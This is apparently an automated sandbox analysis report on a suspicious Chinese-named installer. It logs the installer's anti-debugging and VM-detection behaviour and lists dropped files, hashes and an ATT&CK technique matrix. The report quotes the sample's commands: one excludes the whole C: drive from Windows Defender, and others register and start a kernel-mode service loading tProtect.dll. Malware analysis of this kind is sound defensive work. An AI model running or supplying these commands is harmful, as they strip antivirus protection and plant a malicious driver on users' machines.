Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4268
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Window / User API: threadDelayed 687
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Window / User API: threadDelayed 657
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Window / User API: threadDelayed 610
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-RO25N.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2056 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C9FAEC0 FindFirstFileA,FindClose,FindClose, 5_2_6C9FAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A66868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 9_2_00A66868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A67496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 9_2_00A67496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A69C60 GetSystemInfo, 9_2_00A69C60
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000002.1789451090.00000000007B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000002.1789451090.00000000007B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883886 NtSetInformationThread 00000000,00000011,00000000,00000000 5_2_6C883886
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA10181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_6CA10181
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00AE57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 9_2_00AE57D0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA19D35 mov eax, dword ptr fs:[00000030h] 5_2_6CA19D35
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA19D66 mov eax, dword ptr fs:[00000030h] 5_2_6CA19D66
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA0F17D mov eax, dword ptr fs:[00000030h] 5_2_6CA0F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA08CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_6CA08CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.11.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CAD7720 cpuid 5_2_6CAD7720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A6AB2A GetSystemTimeAsFileTime,9_2_00A6AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00B00090 GetVersion,9_2_00B00090
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory331
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1579603
Sample: #U5b89#U88c5#U52a9#U624b_1.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 80

Signatures attached to the sample node:
  • Found driver which could be used to inject code into processes
  • PE file contains section with special chars
  • AI detected suspicious sample
  • Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree as drawn in the graph (the small numbers after a process name are the graph's count badges, see the legend above):
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe 2 (started)
      • dropped: C:\...\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, PE32
      • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp 3 5 (started)
          • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
          • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
          • signature: Adds a directory exclusion to Windows Defender
          • #U5b89#U88c5#U52a9#U624b_1.0.8.exe 2 (started)
              • dropped: C:\...\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, PE32
              • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp 4 16 (started)
                  • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
                  • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
                  • dropped: C:\Program Files (x86)\...\trash (copy), PE32+
                  • dropped: 3 other files (none is malicious)
                  • signature: Query firmware table information (likely to detect VMs)
                  • signature: Protects its processes via BreakOnTermination flag
                  • signature: Hides threads from debuggers
                  • signature: Contains functionality to hide a thread from the debugger
                  • 7zr.exe 2 (started)
                      • dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
                      • conhost.exe (started)
                  • 7zr.exe 6 (started)
                      • conhost.exe (started)
          • powershell.exe 23 (started)
              • signature: Loading BitLocker PowerShell Module
              • conhost.exe (started)
              • WmiPrvSE.exe (started)
  • cmd.exe (started)
      • sc.exe 1 (started)
          • conhost.exe (started)
  • cmd.exe (started)
      • sc.exe 1 (started)
          • conhost.exe (started)
  • 32 other processes
      • sc.exe 1 (started), three instances, each starting a conhost.exe
      • 28 other processes
          • conhost.exe (started)
          • 27 other processes

Source | Detection | Scanner | Label
#U5b89#U88c5#U52a9#U624b_1.0.8.exe | 0% | ReversingLabs |
#U5b89#U88c5#U52a9#U624b_1.0.8.exe | 6% | Virustotal |

Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs |
C:\Program Files (x86)\Windows NT\is-RO25N.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs |
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | false | | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | unknown
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | false | | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | unknown
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | false | | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | false | | unknown
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579603
Start date and time: 2024-12-23 05:05:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 112
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_1.0.8.exe (renamed because the original name is a hash value)
Original Sample Name: _1.0.8.exe
Detection: MAL
Classification: mal80.evad.winEXE@144/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 66
• Number of non-executed functions: 74
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:06:07 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp modified
23:06:10 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | (not shown) | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | (not shown) | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | ekTL8jTI4D.msi | (not shown) | malicious | Unknown
C:\Program Files (x86)\Windows NT\is-RO25N.tmp | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | (not shown) | malicious | Unknown
C:\Program Files (x86)\Windows NT\is-RO25N.tmp | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | (not shown) | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
• Filename: ekTL8jTI4D.msi, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999225319458047
Encrypted: true
SSDEEP: 6144:9kdN1LFIJMjnJSkbZjcFs3hSU16LWlIHO+SgwcyyGYJ4:q1LFIejnJ7bZwY6LWwO+xby+S
MD5: A64035088C56F185A72562787F46C65F
SHA1: 4F74D232C77E47AC1530157078AC3F010A5BE814
SHA-256: BA48ABC7A735A5C78CA4F103C9F7BC8DD65F9D08622B1AA0F8F2D32B64E7E93A
SHA-512: C532C5BA86285B52015A38303377FE17BBC279224F718EE329BBD39DC424269338CC712809432FBB2B785C97797A3991F1548413953592E7AC1D1BD8594A31F1
Malicious: false
                              Preview:.@S....%....,..............[E.J......W(b.7.N...gFd/...m ..H\..q..e.....G....>.*..`DAt...4W.....O......uj..Gm..R.'..P<W......o.u..{`,..5..F........T..d.<........o...'....R.M...a......Jdp....n....*}|x.6.....5..P<.7.v...F...J..8.....[..@E..-..m*.I.T.....J.:........(....nD....Xg.h..........-}`...k...$.~M.....)..o.].{..B..Rg...j.....Z.O....T.t)\.....Re=.U..Q.>...=....Z..6}p.....A..*CF..g..^.x.W..Nx9.`......9*.....e...X..>...7..<?......2...r.b.-..j.R.7.-.....XC..." ...!....U.UFfw...zlH....BLq....c".Z..V..+.&....b..%.z.W.b..v.s.0E..C.:k0..~..&..o....X....<..K".3:....,...oe....L.....4..j..3r.h<#..00.....Jr..../.HZi.u...e.{=.8..(,..}A.$L..........b...c..d..J..i.Q.4.8.....hX.<oL.-832.L|}Yw...Rt.V.}.&..F........'......l....Y.O.. ..c.&....;.@........(V...1........0..4....J.O.........*B......l..)Z...O.V....w.k.|m....9..xz+3.a...j.g<t..d2.f0.j..#y..P[.}.....{....km.vf,.{....;...c........3$.As.....l...:..%..4.3....h..N..*.........R....C^>t..lH.....
Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
